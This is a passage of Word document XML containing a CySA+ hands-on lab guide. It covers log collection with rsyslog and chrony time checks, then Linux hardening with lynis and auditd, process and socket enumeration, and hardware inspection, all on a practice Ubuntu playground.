          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>chronyc tracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>chronyc sources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The Stratum field tells you how many hops to a reference clock. Last offset is how far your clock was off at the last update. Anything bigger than 1 second is a SOC red flag — it can defeat Kerberos and log correlation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Force an immediate sync:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>chronyc makestep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Inspect the rsyslog configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat /etc/rsyslog.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls /etc/rsyslog.d/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The main file routes messages by facility (auth, cron, kern, mail, daemon, local0–7) and severity (emerg, alert, crit, err, warning, notice, info, debug). These are the eight CySA+ "logging levels" you must memorise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Generate logs at each severity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>logger -p user.info "lab1: info message"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>logger -p user.warning "lab1: warning message"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>logger -p user.err "lab1: error message"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>logger -p auth.crit "lab1: simulated critical auth failure"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>logger is the standard tool to inject a syslog message from the shell. Now read them back:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tail -n 20 /var/log/syslog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>grep lab1 /var/log/syslog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Configure a central collector (loopback test)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Edit /etc/rsyslog.d/10-collector.conf:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; /etc/rsyslog.d/10-collector.conf &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>module(load="imudp")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>input(type="imudp" port="514")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>*.* /var/log/central.log</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systemctl restart rsyslog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This loads the UDP input module and writes every received message to /var/log/central.log. Now forward local messages to ourselves over UDP:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo '*.* @127.0.0.1:514' &gt; /etc/rsyslog.d/20-forward.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>systemctl restart rsyslog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>logger -p local0.notice "lab1: forwarded test"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sleep 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tail /var/log/central.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You have just built a one-host SIEM ingestion pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Confirm receiver is listening</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ss -ulnp | grep :514</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should see rsyslogd bound to UDP/514.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The 8 syslog severity levels and how to filter on them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How to inject messages with logger and follow them in /var/log/syslog.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How to centralise logs over UDP/514 with rsyslog.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Why time sync is required before correlation — and how to verify it with chronyc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The Stratum field tells you how many hops to a reference clock. Last offset is how far your clock was off at the last update. Anything bigger than 1 second is a SOC red flag — it can defeat Kerberos and log correlation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 2 — OS Hardening and System Process Inspection</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audit a Linux host with lynis, enable kernel-level auditing with auditd, and inspect running processes, kernel modules, and hardware to spot deviations from a baseline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will audit a Linux host with lynis, enable kernel-level auditing with auditd, and inspect running processes, kernel modules, and hardware to spot deviations from a baseline. These are exam-blueprint skills under CySA+ 1.1 (Operating system concepts — system hardening, system processes, hardware architecture, file structure).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run all commands on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install hardening and audit tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y lynis auditd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>lynis is a free CIS-style hardening scanner. auditd is the Linux audit subsystem that records syscall-level events.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Inspect the file structure and configuration locations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls /etc | head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls /var/log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls /proc/sys/kernel | head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cyber analysts must know where configuration lives:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/etc — system configuration files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/var/log — log files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/proc/sys and /sys — kernel tunables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>~/.ssh, ~/.bash_history — per-user artefacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Enumerate processes (CySA+ "system processes")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ps -ef --forest | head -30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ps -eo pid,user,%cpu,%mem,etime,cmd --sort=-%cpu | head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Look for unexpected parents — e.g. bash spawned by httpd is a classic web-shell indicator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>List open network sockets and which process owns them:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ss -tulnp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Inspect the hardware architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lscpu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lsmem 2&gt;/dev/null || free -h</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lspci 2&gt;/dev/null | head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>uname -a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CySA+ expects you to know x86_64 vs ARM, CPU virtualization flags, and how to read uname for kernel version (which CVEs depend on).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Run a Lynis hardening audit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lynis audit system --quick</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>When it finishes, scroll to Suggestions and Hardening index. Common findings:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SSH PermitRootLogin should be no</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
